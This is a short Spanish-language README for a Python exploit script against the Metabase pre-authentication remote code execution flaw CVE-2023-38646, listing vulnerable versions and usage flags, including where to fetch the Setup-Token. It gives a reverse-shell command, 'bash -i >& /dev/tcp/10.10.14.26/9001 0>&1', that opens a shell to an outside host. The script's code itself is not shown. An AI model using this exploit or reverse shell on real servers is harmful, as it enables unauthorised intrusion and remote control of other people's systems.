
Script de explotación para Pre-Auth RCE en Metabase (CVE-2023-38646)
Este es un script de Python que explota la vulnerabilidad de ejecución remota de código del software de inicio de sesión de Metabase. Permite ejecutar comandos arbitrarios en el servidor antes de la autenticación.
Las versiones vulnerables son Metabase open source anteriores a 0.46.6.1 y Metabase Enterprise anteriores a 1.46.6.1
python3 exploit.py -u URL -t TOKEN -c COMMAND
-h, --help muestra este mensaje de ayuda y sale
-u URL, --url URL URL objetivo
-t TOKEN, --token TOKEN
Setup-Token encontrado en /api/session/properties
-c COMMAND, --command COMMAND
Comando a ejecutar en el host objetivo

Comando utilizado: bash -i >& /dev/tcp/10.10.14.26/9001 0>&1
Encadenando nuestro camino hacia RCE pre-autenticación en Metabase (CVE-2023-38646)